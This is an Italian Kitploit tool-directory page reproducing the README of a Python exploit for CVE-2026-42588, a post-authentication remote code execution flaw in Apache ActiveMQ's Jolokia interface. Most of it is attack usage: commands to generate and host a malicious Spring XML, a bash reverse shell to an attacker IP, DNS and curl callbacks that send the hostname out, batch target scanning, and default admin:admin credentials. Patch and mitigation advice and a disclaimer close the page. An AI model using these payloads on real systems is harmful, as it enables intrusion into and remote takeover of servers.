Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-42588 — Exploit RCE basato su Python per CVE-2026-42588 che mira ad Apache ActiveMQ Jolokia. Include modalità solo verifica, generazione di XML dannoso e supporto per reverse shell, OOB e verifica basata su file. | Kitploit
Strumenti/GitHubGitHub/hnytgl/cve-2026-42588
Analisi delle VulnerabilitàAnalisi del CodiceExploitSfruttamento di Applicazioni WebPenetration TestingRed TeamingStrumento di Accesso Remoto
GitHubhnytgl/cve-2026-42588

CVE-2026-42588

Exploit RCE basato su Python per CVE-2026-42588 che mira ad Apache ActiveMQ Jolokia. Include modalità solo verifica, generazione di XML dannoso e supporto per reverse shell, OOB e verifica basata su file.

Vedi Repository
323 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-42588 - Sfruttamento di Esecuzione di Codice Remoto in Apache ActiveMQ Jolokia

Gravità: 🔴 Alta (CVSS 4.0: 8.1)
Tipo di vulnerabilità: CWE-94 — Iniezione di codice
Versioni interessate: Apache ActiveMQ < 5.19.7 / 6.0.0 ≤ versione < 6.2.6
Prerequisito di sfruttamento: Credenziali di autenticazione per Web Console (predefinito admin:admin)


📋 Indice

  • Panoramica della vulnerabilità
  • Principio della vulnerabilità
  • Versioni interessate
  • Condizioni di sfruttamento
  • Descrizione dei file
  • Avvio rapido
  • Utilizzo dettagliato
  • Panoramica della catena di sfruttamento
  • Verifica del successo dello sfruttamento
  • Soluzioni di correzione
  • Misure di mitigazione temporanee
  • FAQ
  • Disclaimer
  • Link di riferimento

Panoramica della vulnerabilità

CVE-2026-42588 è una vulnerabilità di Esecuzione di Codice Remoto (RCE) post-autenticazione presente in Apache ActiveMQ.

Un attaccante, in possesso delle credenziali di autenticazione per la Web Console, può sfruttare l'interfaccia bridge Jolokia JMX-HTTP (/api/jolokia/) per invocare il metodo BrokerService.addNetworkConnector(String), passando un URI masterslave:// appositamente costruito. Utilizzando il protocollo xbean:, carica un file di configurazione Spring XML remoto, eseguendo infine comandi arbitrari di sistema nella JVM del broker ActiveMQ.


Principio della vulnerabilità

Catena di sfruttamento

root@kitploit:~
/api/jolokia/ (Bridge Jolokia JMX-HTTP)
       │
       ▼
BrokerService.addNetworkConnector(String)
       │
       ▼
masterslave://?brokerConfig=xbean:http://attaccante/malicious.xml
       │
       ▼
XBeanBrokerFactory → ResourceXmlApplicationContext
       │
       ▼
Spring istanzia preventivamente tutti i bean singleton → Attiva Runtime.exec() / ProcessBuilder
       │
       ▼
🚨 Esecuzione di Codice Remoto (RCE)

Punti tecnici chiave

FaseDescrizione
Superficie esposta di JolokiaLa Web Console di ActiveMQ espone di default /api/jolokia/, consentendo l'esecuzione dell'operazione exec sui MBean org.apache.activemq:*
Metodo pericolosoBrokerService.addNetworkConnector(String) riceve un URI di discovery e lo analizza
Catena URIIl parametro brokerConfig del protocollo masterslave:// è controllabile e, insieme allo schema xbean:, attiva il caricamento del contesto Spring
Punto di attivazione RCEXBeanBrokerFactory utilizza ResourceXmlApplicationContext per caricare XML remoto; Spring istanzia tutti i bean singleton prima della validazione della configurazione

Versioni interessate

Intervallo di versioneStato
Apache ActiveMQ < 5.19.7❌ Vulnerabile
6.0.0 ≤ Apache ActiveMQ < 6.2.6❌ Vulnerabile
Apache ActiveMQ ≥ 5.19.7✅ Corretto
Apache ActiveMQ ≥ 6.2.6✅ Corretto

Condizioni di sfruttamento

  1. ✅ Raggiungibilità di rete — L'interfaccia /api/jolokia/ deve essere accessibile all'attaccante (porta predefinita 8161)
  2. ✅ Credenziali valide — Possesso delle credenziali di autenticazione per la Web Console di ActiveMQ (predefinito admin:admin)
  3. ✅ Server HTTP dell'attaccante — Necessario un server HTTP raggiungibile dal target per ospitare il file XML malevolo

Descrizione dei file

root@kitploit:~
.
├── CVE-2026-42588_EXP.py   # Script di sfruttamento della vulnerabilità (core)
├── malicious.xml            # Template XML Spring malevolo
├── requirements.txt         # Dipendenze Python
└── README.md                # Questo file
FileUtilizzo
CVE-2026-42588_EXP.pyScript di sfruttamento Python, supporta modalità di rilevamento (--check-only) e generazione XML (--gen-xml)
malicious.xmlTemplate di configurazione XML Spring malevolo, include due modalità di sfruttamento: Runtime.exec() e ProcessBuilder

Avvio rapido

1. Installare le dipendenze

root@kitploit:~
pip install -r requirements.txt

2. Generare il file XML malevolo

root@kitploit:~
python CVE-2026-42588_EXP.py --gen-xml -c "touch /tmp/activemq_pwned" > malicious.xml

3. Ospitare il file XML malevolo

Avviare un server HTTP sulla macchina attaccante:

root@kitploit:~
python3 -m http.server 8080

4. Eseguire lo sfruttamento

root@kitploit:~
# Utilizzo credenziali predefinite admin/admin
python CVE-2026-42588_EXP.py \
    -u http://192.168.1.100:8161 \
    -x http://tuo-indirizzo-attaccante:8080/malicious.xml

# Utilizzo credenziali personalizzate
python CVE-2026-42588_EXP.py \
    -u http://target:8161 \
    -U mioutente \
    -P miapassword \
    -x http://tuo-indirizzo-attaccante:8080/malicious.xml

5. (Opzionale) Solo rilevamento vulnerabilità

root@kitploit:~
python CVE-2026-42588_EXP.py -u http://192.168.1.100:8161 --check-only

Utilizzo dettagliato

Parametri da riga di comando

root@kitploit:~
usage: CVE-2026-42588_EXP.py [-h] [-u URL] [-U USERNAME] [-P PASSWORD]
                             [-x XML_URL] [--check-only] [--gen-xml]
                             [-c COMMAND] [--timeout TIMEOUT] [--no-verify]

Opzioni:
  -u, --url         URL del target ActiveMQ (es. http://192.168.1.100:8161)
  -U, --username    Nome utente Web Console (predefinito: admin)
  -P, --password    Password Web Console (predefinito: admin)
  -x, --xml-url     URL remoto del file XML Spring malevolo
  --check-only      Solo rilevamento accessibilità interfaccia Jolokia
  --gen-xml         Genera file XML malevolo e lo invia su stdout
  -c, --command     Comando da eseguire sul target (predefinito: touch /tmp/activemq_pwned)
  --timeout         Timeout richiesta HTTP in secondi (predefinito: 30)
  --no-verify       Disabilita verifica del certificato SSL

Scenario 1: Reverse Shell

1. Generare il file XML malevolo sulla macchina attaccante:

root@kitploit:~
python CVE-2026-42588_EXP.py --gen-xml \
    -c "/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.1/4444 0>&1'" \
    > reverse_shell.xml

2. Ospitare il XML e avviare l'ascolto:

root@kitploit:~
# Terminale 1: Server HTTP
python3 -m http.server 8080

# Terminale 2: Ascolto nc
nc -lvnp 4444

3. Attivare la vulnerabilità:

root@kitploit:~
python CVE-2026-42588_EXP.py \
    -u http://target:8161 \
    -x http://10.0.0.1:8080/reverse_shell.xml

Scenario 2: Esecuzione comando CMD (target Windows)

1. Generare file XML malevolo per Windows:

Modificare il comando ProcessBuilder in malicious.xml in:

root@kitploit:~
<bean class="java.lang.ProcessBuilder" init-method="start">
    <constructor-arg>
        <list>
            <value>cmd.exe</value>
            <value>/c</value>
            <value>whoami &gt; C:\windows\temp\pwned.txt</value>
        </list>
    </constructor-arg>
</bean>

2. Ospitare ed eseguire:

root@kitploit:~
python CVE-2026-42588_EXP.py \
    -u http://windows-target:8161 \
    -x http://attaccante:8080/malicious_win.xml

Scenario 3: Solo rilevamento vulnerabilità

root@kitploit:~
# Rilevamento batch
for ip in $(cat targets.txt); do
    echo "=== Test $ip ==="
    python CVE-2026-42588_EXP.py -u "http://$ip:8161" --check-only --timeout 5
done

Panoramica della catena di sfruttamento

root@kitploit:~
┌─────────────────────────────────────────────────────────────────────┐
│                        Catena di attacco CVE-2026-42588              │
├─────────────────────────────────────────────────────────────────────┤
│                                                                      │
│  ① Attaccante                        ⑤ Broker ActiveMQ (JVM)        │
│  ┌──────────┐                         ┌──────────────────────────┐   │
│  │ Script   │──── ② HTTP POST ───────▶│ /api/jolokia/            │   │
│  │ EXP      │    Jolokia exec()        │                          │   │
│  │          │    Autenticazione Basic  │ BrokerService.           │   │
│  │          │                          │ addNetworkConnector(     │   │
│  │          │                          │   "masterslave://?       │   │
│  │          │                          │    brokerConfig=         │   │
│  │          │                          │    xbean:http://...      │   │
│  │          │                          │    /malicious.xml"       │   │
│  └──────────┘                          │ )                        │   │
│       │                                └────────┬─────────────────┘   │
│       │                                         │                     │
│       │          ③ HTTP GET                     ▼                     │
│       │  ┌──────────────────────┐  ┌────────────────────────────┐    │
│       └─▶│ Server HTTP          │  │ ResourceXmlApplication     │    │
│          │ attaccante           │  │ Context carica XML remoto   │    │
│          │ (python http.server) │  │                            │    │
│          │                      │  │ Spring istanzia Bean ──▶    │    │
│          │ malicious.xml        │  │ Runtime.exec() /            │    │
│          └──────────────────────┘  │ ProcessBuilder.start()      │    │
│                                    │          │                  │    │
│                                    │          ▼                  │    │
│                                    │    🚨 RCE riuscita 🚨       │    │
│                                    └────────────────────────────┘    │
│                                                                      │
└─────────────────────────────────────────────────────────────────────┘

Verifica del successo dello sfruttamento

Poiché l'esecuzione dei comandi avviene durante la fase di analisi dell'XML Spring, è asincrona; la risposta HTTP potrebbe non mostrare direttamente il risultato dell'esecuzione. Si consiglia di verificare tramite i seguenti metodi:

Metodo 1: Reverse Shell (più affidabile)

root@kitploit:~
# Macchina attaccante
nc -lvnp 4444

Metodo 2: Esfiltrazione DNS (OOB)

root@kitploit:~
# Utilizzare nslookup o curl nel comando per inviare dati
nslookup $(hostname).tuo-server-dns.com

Metodo 3: Rilevamento file creato

root@kitploit:~
# Verificare il file segnalatore sul target
ls -la /tmp/activemq_pwned

Metodo 4: HTTP callback

root@kitploit:~
# Nel XML malevolo utilizzare
curl http://tuo-server:8888/$(hostname)
# E sulla macchina attaccante ascoltare
nc -lvnp 8888

Soluzioni di correzione

✅ Soluzione raccomandata: Aggiornare la versione

Linea di versioneAggiornare a
Serie 5.x5.19.7 o superiore
Serie 6.x6.2.6 o superiore

URL di download: https://activemq.apache.org/download

Annuncio di correzione: https://lists.apache.org/thread/ns0zktfo16s9ql2mmtqtlb6p6xcs45xm


Misure di mitigazione temporanee

Se non è possibile aggiornare immediatamente, si possono adottare le seguenti misure per ridurre il rischio:

1. Limitare l'accesso all'interfaccia Jolokia

In conf/jetty.xml limitare /api/jolokia/ all'accesso solo da locale, oppure tramite firewall/reverse proxy con whitelist IP.

2. Modificare le policy di accesso a Jolokia

Modificare conf/jolokia-access.xml per vietare l'operazione exec sui MBean org.apache.activemq:*:

root@kitploit:~
<restrict>
    <mbean>
        <name>org.apache.activemq:*</name>
        <operation>!exec</operation>
    </mbean>
</restrict>

3. Modificare le credenziali predefinite

Modificare conf/jetty-realm.properties e cambiare le credenziali predefinite admin: admin, admin con una password forte.

4. Disabilitare la Web Console (se non necessaria)

In conf/jetty.xml commentare la configurazione del Context relativo alla Web Console.


FAQ

D: Questa vulnerabilità richiede autenticazione?

R: Sì, sono necessarie credenziali valide per la Web Console di ActiveMQ. Tuttavia, le credenziali predefinite sono admin/admin e in molti ambienti reali la password predefinita non viene modificata, quindi il rischio rimane elevato.

D: Dopo l'esecuzione dell'EXP non c'è output, cosa fare?

R: È normale. L'esecuzione del comando è asincrona e avviene durante la fase di analisi dell'XML Spring. Si consiglia di utilizzare reverse shell, esfiltrazione DNS o altri metodi per la verifica. Vedi Verifica del successo dello sfruttamento.

D: Supporta target Windows?

R: Sì. È necessario modificare i comandi in malicious.xml da /bin/sh -c a cmd.exe /c e adattare la sintassi dei comandi allo stile Windows.

D: La modalità di rilevamento (--check-only) può determinare se la vulnerabilità è presente?

R: La modalità di rilevamento può solo confermare se l'interfaccia Jolokia è accessibile (condizione necessaria per lo sfruttamento). L'accessibilità dell'interfaccia non garantisce che sia sfruttabile, ma ne indica la possibilità.

D: Dopo la correzione, la vulnerabilità può ancora essere sfruttata?

R: No. Dopo l'aggiornamento a 5.19.7+ o 6.2.6+, la logica di analisi del parametro brokerConfig è stata corretta e non accetta più lo schema xbean:.


Disclaimer

⚠️ Questo strumento è solo per scopi di ricerca sulla sicurezza e test autorizzati!

  • L'utilizzo di questo strumento per accedere a sistemi non autorizzati è illegale
  • L'utente si assume ogni responsabilità per qualsiasi conseguenza derivante dall'uso di questo strumento
  • L'autore non è responsabile per usi non autorizzati, abusi o danni derivanti
  • Utilizzare solo su propri sistemi o su sistemi con autorizzazione scritta
  • Rispettare le leggi locali e i codici etici professionali

Link di riferimento

FonteLink
Database vulnerabilità (CVE Detail)https://www.cybersecurity-help.cz/vdb/vulns/133395/
Annuncio vulnerabilità di Antiyhttps://bbs.antiy.cn/thread-210844-1-1.html
Dettagli vulnerabilità DDPOChttps://ddpoc.com/DVB-2026-11290.html
Sito ufficiale Apache ActiveMQhttps://activemq.apache.org/
Annuncio di sicurezza Apachehttps://lists.apache.org/thread/ns0zktfo16s9ql2mmtqtlb6p6xcs45xm

CVE-2026-42588 — Solo per scopi educativi e test autorizzati

Scarica lo strumento